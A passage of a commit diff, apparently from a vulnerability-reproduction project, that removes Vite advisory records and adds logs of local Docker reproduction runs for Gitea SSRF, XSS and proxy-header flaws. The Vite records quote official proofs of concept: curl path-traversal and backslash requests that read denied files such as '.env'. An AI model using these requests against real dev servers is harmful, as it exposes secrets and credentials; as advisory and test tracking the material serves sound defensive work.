[indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
"published_at": "2025-09-09T20:54:42Z",
"updated_at": "2026-02-04T04:35:16.287471Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
"https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
"https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
],
"aliases": [
"CVE-2025-58752",
"GHSA-jqfw-vq24-v9c3"
],
"cve_ids": [
"CVE-2025-58752"
],
"ghsa_ids": [
"GHSA-jqfw-vq24-v9c3"
],
"osv_ids": [
"GHSA-jqfw-vq24-v9c3"
],
"affected_versions": [
"introduced=7.1.0, fixed<7.1.5",
"introduced=7.0.0, fixed<7.0.7",
"introduced=6.0.0, fixed<6.3.6",
"introduced=0, fixed<5.4.20"
],
"fixed_versions": [
"7.1.5",
"7.0.7",
"6.3.6",
"5.4.20"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

81
08-threat-intel/registry/advisories/vite--CVE-2025-62522.json
查看文件

@@ -1,81 +0,0 @@
{
"canonical_id": "vite--CVE-2025-62522",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "vite allows server.fs.deny bypass via backslash on Windows",
"summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n<img width=\"1593\" height=\"616\" alt=\"image\" src=\"https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175\" />",
"published_at": "2025-10-20T19:54:28Z",
"updated_at": "2026-02-04T04:13:38.886554Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-62522",
"https://github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-62522",
"GHSA-93m4-6634-74q7"
],
"cve_ids": [
"CVE-2025-62522"
],
"ghsa_ids": [
"GHSA-93m4-6634-74q7"
],
"osv_ids": [
"GHSA-93m4-6634-74q7"
],
"affected_versions": [
"introduced=7.1.0, fixed<7.1.11",
"introduced=7.0.0, fixed<7.0.8",
"introduced=6.0.0, fixed<6.4.1",
"introduced=2.9.18, fixed<5.4.21",
"introduced=3.2.9, fixed<5.4.21",
"introduced=4.5.3, fixed<5.4.21",
"introduced=5.2.6, fixed<5.4.21"
],
"fixed_versions": [
"7.1.11",
"7.0.8",
"6.4.1",
"5.4.21"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

145
08-threat-intel/registry/runs/gitea-gitea--CVE-2018-15192-20260318012749.json 普通文件
查看文件

@@ -0,0 +1,145 @@
{
"run_id": "gitea-gitea--CVE-2018-15192-20260318012749",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2018-15192",
"repro_profile_id": "gitea-ssrf",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.ssrf",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
}
],
"browser_refs": [],
"browser_evidence": {
"required": false,
"present": false,
"refs": [],
"baseline_refs": [],
"proof_refs": [],
"baseline_title": null,
"proof_title": null,
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:27:49+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2018-15192"
},
{
"at": "2026-03-18T01:27:49+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-ssrf"
},
{
"at": "2026-03-18T01:27:49+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:27:52+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:27:54+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:27:54+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2018-15192-20260318012749"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side callback reached the local sink"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:27:49+00:00",
"finished_at": "2026-03-18T01:27:54+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd"
}
}

197
08-threat-intel/registry/runs/gitea-gitea--CVE-2018-18926-20260318012526.json 普通文件
查看文件

@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2018-18926-20260318012526",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2018-18926",
"repro_profile_id": "gitea-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
],
"baseline_title": "Gitea Proxy Boundary Fixture",
"proof_title": "Gitea Proxy Boundary Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:25:26+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2018-18926"
},
{
"at": "2026-03-18T01:25:26+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-proxy-boundary"
},
{
"at": "2026-03-18T01:25:27+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:25:41+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:25:42+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:25:43+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:25:43+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:25:45+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:25:45+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2018-18926-20260318012526"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "trusted forwarded headers crossed the boundary"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:25:26+00:00",
"finished_at": "2026-03-18T01:25:45+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd"
}
}

197
08-threat-intel/registry/runs/gitea-gitea--CVE-2019-1010261-20260318012624.json 普通文件
查看文件

@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2019-1010261-20260318012624",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2019-1010261",
"repro_profile_id": "gitea-xss",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.xss",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
],
"proof_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
],
"baseline_title": "Gitea Stored XSS Fixture",
"proof_title": "Gitea Stored XSS Fixture - proof",
"error_kind": null,
"reason": null
},
"container_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
],
"request_log_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
],
"compose_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
],
"timeline": [
{
"at": "2026-03-18T01:26:24+00:00",
"step": "select-advisory",
"status": "completed",
"detail": "gitea--CVE-2019-1010261"
},
{
"at": "2026-03-18T01:26:24+00:00",
"step": "resolve-repro-profile",
"status": "completed",
"detail": "gitea-xss"
},
{
"at": "2026-03-18T01:26:24+00:00",
"step": "doctor",
"status": "completed",
"detail": "all checks passed"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "provision-compose-environment",
"status": "ready",
"detail": ""
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "wait-ready",
"status": "completed",
"detail": "baseline urls ready (1)"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "seed-environment",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:26:27+00:00",
"step": "baseline-snapshot",
"status": "completed",
"detail": "urls=1"
},
{
"at": "2026-03-18T01:26:28+00:00",
"step": "browser-replay-before-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:26:28+00:00",
"step": "controlled-attack-chain",
"status": "completed",
"detail": "steps=1"
},
{
"at": "2026-03-18T01:26:29+00:00",
"step": "browser-replay-after-attack",
"status": "completed",
"detail": ""
},
{
"at": "2026-03-18T01:26:29+00:00",
"step": "collect-logs-and-evidence",
"status": "completed",
"detail": "container_logs=1"
},
{
"at": "2026-03-18T01:26:30+00:00",
"step": "cleanup-compose-environment",
"status": "completed",
"detail": "docker compose down completed"
},
{
"at": "2026-03-18T01:26:30+00:00",
"step": "update-registry-and-reports",
"status": "completed",
"detail": "gitea-gitea--CVE-2019-1010261-20260318012624"
}
],
"success_evaluation": {
"passed": true,
"verification_status": "verified-real",
"blocked_reason": null,
"assertions": [
{
"name": "baseline-ok",
"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "stored payload rendered inside the browser proof page"
},
{
"name": "browser-present",
"kind": "browser-present",
"passed": true,
"detail": "browser evidence captured"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:26:24+00:00",
"finished_at": "2026-03-18T01:26:30+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd"
}
}

197
08-threat-intel/registry/runs/gitea-gitea--CVE-2020-13246-20260318012806.json 普通文件
查看文件

@@ -0,0 +1,197 @@
{
"run_id": "gitea-gitea--CVE-2020-13246-20260318012806",
"system_id": "gitea",
"advisory_id": "gitea--CVE-2020-13246",
"repro_profile_id": "gitea-proxy-boundary",
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"target_env": "local-docker",
"compose_services": [
"app"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
],
"attack_steps": [
{
"kind": "runner",
"tool": "gitea.proxy-boundary",
"status": "completed",
"status_code": 200,
"result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
}
],
"browser_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"browser_evidence": {
"required": true,
"present": true,
"refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
],
"baseline_refs": [
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
"/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
